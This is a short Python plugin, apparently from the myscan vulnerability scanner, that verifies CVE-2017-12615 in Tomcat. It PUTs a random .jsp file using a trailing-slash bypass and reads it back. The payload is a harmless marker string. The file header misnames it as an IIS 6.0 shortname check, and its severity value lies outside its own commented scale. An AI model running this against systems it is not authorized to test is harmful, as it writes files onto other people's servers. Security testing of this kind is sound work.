#!/usr/bin/env python3
# @Time    : 2020-02-17
# @Author  : caicai
# @File    : poc_iis_6.0_shortname.py
import copy
from myscan.config import scan_set
from myscan.lib.helper.request import request
from myscan.lib.core.common import get_random_str


class POC():
    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python的dict数据，详情请看docs/开发指南Example dict数据示例
        self.url = workdata.get("data")  # self.url为需要测试的url，值为目录url，会以/结尾,如https://www.baidu.com/home/ ,为目录
        self.result = []  # 此result保存dict数据，dict需包含name,url,level,detail字段，detail字段值必须为dict。如下self.result.append代码
        self.name = "tomcat put rce"
        self.vulmsg = '''cve-2017-12615,Tomcat配置了可写（readonly=false），导致我们可以往服务器写文件'''
        self.level = 3  # 0:Low  1:Medium 2:High

    def verify(self):
        # 根据config.py 配置的深度，限定一下目录深度
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return

        url = self.url + get_random_str(6).lower() + ".jsp"
        data = get_random_str(20)
        req = {
            "method": "PUT",
            "url": url+"/",
            "headers": self.dictdata.get("request").get("headers"),  # 主要保留cookie等headers
            "data": data,
            "timeout": 10,
            "verify": False,
        }

        r = request(**req)
        if r != None and r.status_code == 201:
            req2 = {
                "method": "GET",
                "url": url,
                "headers": self.dictdata.get("request").get("headers"),  # 主要保留cookie等headers
                "timeout": 10,
                "verify": False,
            }
            r2 = request(**req2)
            if r2 and data in r2.text:
                self.result.append({
                    "name": self.name,
                    "url": self.url,
                    "level": self.level,  # 0:Low  1:Medium 2:High
                    "detail": {
                        "vulmsg": self.vulmsg,
                    }
                })
